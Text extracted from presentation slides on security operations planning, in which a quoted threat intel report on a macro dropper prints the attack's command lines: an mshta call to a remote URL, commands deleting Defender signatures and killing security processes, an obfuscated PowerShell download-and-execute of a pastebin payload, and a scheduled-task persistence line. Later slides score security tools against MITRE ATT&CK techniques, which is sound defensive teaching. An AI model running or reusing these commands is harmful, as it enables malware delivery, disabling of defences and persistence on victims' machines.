  • 18. • Multi-Stage Backdoor Dropper Document Possibly Targeting Online Services Vendors Observed • 1st stage: Dropper Document after enabling VBA macros executes mshta.exe with the following command line: mshta.exe http://www.tinyurl[.]com/shlsqd • The referenced TinyURL address redirects to https://www.faild2ptch[.]com/oh/no.html, which provides URL-escaped JavaScript (JS) that performs the following actions: 1. Removes OS Defender dynamic signatures using the following command line: MpCmdRun.exe-removedefinitions- dynamicsignatures 2. Kills all open Office applications using the following command line: taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE 3. Kills the OS Defender notification process using the command line: taskkill /f /im MSASCuiL.exe 4. Disables unsafe files being opened in protected view by writing to one of the following registry paths: HKCUSoftwareMicrosoftOffice[11- 16].0[Excel|Word|PowerPoint]SecurityProtectedViewDisableUnsafeLocationsInPV 5. Downloads and executes a remotely hosted .NET PE https://pastebin[.]com/raw/dhVymUy3 using PowerShell executed by mshta.exe with the following command line: mshta.exe vbscript:CreateObject(Wscript.Shell).Run(powershell.exe -noexit - command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New- ObjectNet.WebClient).DownloadString('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m (window.close) 6. Creates a registry run key under HKCUSoftwareMicrosoftWindowsCurrentVersionRunMicrosoftUpdate with the following command line to execute a scheduled task every 100 minutes to download and execute a remote payload using mshta.exe: schtasks /create /sc MINUTE /mo 100 /tn "eScan Backup" /tr "mshta vbscript:CreateObject("Wscript.Shell").Run("mshta.exe https://pastebin[.]com/raw/df861P8c",0,true)(window.close)"" /F Scenario 2: Threat Intel Report
  • 19. • Multi-Stage Backdoor Dropper Document Possibly Targeting Online Services Vendors Observed • 1st stage: Dropper Document after enabling VBA macros executes mshta.exe with the following command line: mshta.exe http://www.tinyurl[.]com/shlsqd • The referenced TinyURL address redirects to https://www.faild2ptch[.]com/oh/no.html, which provides URL-escaped JavaScript (JS) that performs the following actions: 1. Removes OS Defender dynamic signatures using the following command line: MpCmdRun.exe-removedefinitions- dynamicsignatures 2. Kills all open Office applications using the following command line: taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE 3. Kills the OS Defender notification process using the command line: taskkill /f /im MSASCuiL.exe 4. Disables unsafe files being opened in protected view by writing to one of the following registry paths: HKCUSoftwareMicrosoftOffice[11- 16].0[Excel|Word|PowerPoint]SecurityProtectedViewDisableUnsafeLocationsInPV 5. Downloads and executes a remotely hosted .NET PE https://pastebin[.]com/raw/dhVymUy3 using PowerShell executed by mshta.exe with the following command line: mshta.exe vbscript:CreateObject(Wscript.Shell).Run(powershell.exe -noexit - command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New- ObjectNet.WebClient).DownloadString('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m (window.close) 6. Creates a registry run key under HKCUSoftwareMicrosoftWindowsCurrentVersionRunMicrosoftUpdate with the following command line to execute a scheduled task every 100 minutes to download and execute a remote payload using mshta.exe: schtasks /create /sc MINUTE /mo 100 /tn "eScan Backup" /tr "mshta vbscript:CreateObject("Wscript.Shell").Run("mshta.exe https://pastebin[.]com/raw/df861P8c",0,true)(window.close)"" /F Scenario 2: Threat Intel Report T1193: Spearphishing Attachment T1089: Disabling Security Tools T1170: MshtaT1481: Web Service T1053: Scheduled Task T1027: Obfuscated Files or Information T1064: Scripting T1086: PowerShell T1112: Modify Registry
  • 21. Maturity 0 = We do nothing 1 = Locally logged Relevant data is captured on the endpoint 2 = Centrally logged Data is gathered centrally 4 = Alerting We have rules to detect anomalies, suspicious events 5 = Playbook exists A process to respond exists (incl. analyse, contain, eradicate, recover) 6 = Response is automated We have automated response for this alert 3 = Correlated / enriched Logs for the event are enriched with data from other sources to increase fidelity
  • 22. 6 = Response is automated 5 = Playbook exists 4 = Alerting 3 = Correlated / enriched 2 = Centrally logged 1 = Locally logged 0 = We do nothing
  • 23. Scenario 3: It’s all about the money • There is an ongoing trade war between 2 biggest economies in the world • Unfortunately this has an impact on the wealthiest people who are Sense//Net Library’s customers • Few of them decided to put their AI constructs to sleep until better times come hence your profits decrease • The management decided it’s time to cut costs and your department needs to participate • You don’t want to cut people – they are a great team – so you focus on vendor contracts that are going to be renewed this year – which security control can you afford to get rid of?
  • 24. Measure effectiveness of the toolset MITRE ATT&CK techniques Current Early warning Inbound Protect Detect Outbound Protect Reconnaisance Weaponization, Delivery Weaponization, Delivery, C2 Exploit, Installation, C2, AOO Tool1 Tool2 Tool3 Tool4 Tool5 Tool6 Tool7 Tool8 T1193: Spearphishing Attachment T1089: Disabling Security Tools T1112: Modify Registry T1086: PowerShell T1053: Scheduled Task Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf [2] Would Warn of Activity [0] N/A [2] Would Block Activity [1] Could Block Activity [0] Would Not Block Activity [2] Would Detect Activity [0] No Detection or N/A [2] Would Block Outbound Traffic [1] Could Have Blocked [0] Would Not Block Activity Shortlisted Techniques
  • 25. Measure effectiveness of the toolset MITRE ATT&CK techniques Current Toolset measure Early warning Inbound Protect Detect Outbound Protect Reconnaisance Weaponization, Delivery Weaponization, Delivery, C2 Exploit, Installation, C2, AOO Tool1 Tool2 Tool3 Tool4 Tool5 Tool6 Tool7 Tool8 Current Proposed T1193: Spearphishing Attachment 0 0 2 1 2 0 2 1 8 7 T1089: Disabling Security Tools 2 0 0 2 2 0 2 1 9 8 T1112: Modify Registry 0 0 2 1 2 0 2 1 8 7 T1086: PowerShell 2 0 0 2 2 0 2 1 9 8 T1053: Scheduled Task 2 0 2 1 0 2 2 1 10 7 44 37 100% 84% Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf [2] Would Warn of Activity [0] N/A [2] Would Block Activity [1] Could Block Activity [0] Would Not Block Activity [2] Would Detect Activity [0] No Detection or N/A [2] Would Block Outbound Traffic [1] Could Have Blocked [0] Would Not Block Activity
  • 26. Scenario 4: Let’s go shopping • Times are changing and the company profits picked up • You successfully argued to get a bigger budget and now you can spend some money on a new security control • Your team shortlisted a few vendors and you’ve conducted a PoC • The results are that there a few differences in the products • The procurement team negotiated almost similar prices for the products
  • 27. Measure effectiveness of the toolset MITRE ATT&CK techniques Current Future Toolset measure Early warning Inbound Protect Detect Outbound Protect Proposed Reconnaisance Weaponization, Delivery Weaponization, Delivery, C2 Exploit, Installation, C2, AOO Tool1 Tool2 Tool3 Tool4 Tool5 Tool6 Tool7 Tool8 ToolA ToolB Current ProposedA ProposedB T1193: Spearphishing Attachment 0 2 1 2 2 2 0 7 9 7 T1089: Disabling Security Tools 2 0 2 2 2 0 2 8 8 10 T1112: Modify Registry 0 2 1 2 2 2 0 7 9 7 T1086: PowerShell 2 0 2 2 2 0 0 8 8 8 T1053: Scheduled Task 2 2 1 0 2 2 0 7 9 7 37 43 39 100% 116% 105% 44 43 39 100% 98% 89% Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf [2] Would Warn of Activity [0] N/A [2] Would Block Activity [1] Could Block Activity [0] Would Not Block Activity [2] Would Detect Activity [0] No Detection or N/A [2] Would Block Outbound Traffic [1] Could Have Blocked [0] Would Not Block Activity [2] Proposal Applicable [0] N/A Previous compared to Proposed A and B
  • 29. Putting it all together Vulnerability reports Threat Intel reports Toolset effectiveness Response maturity ...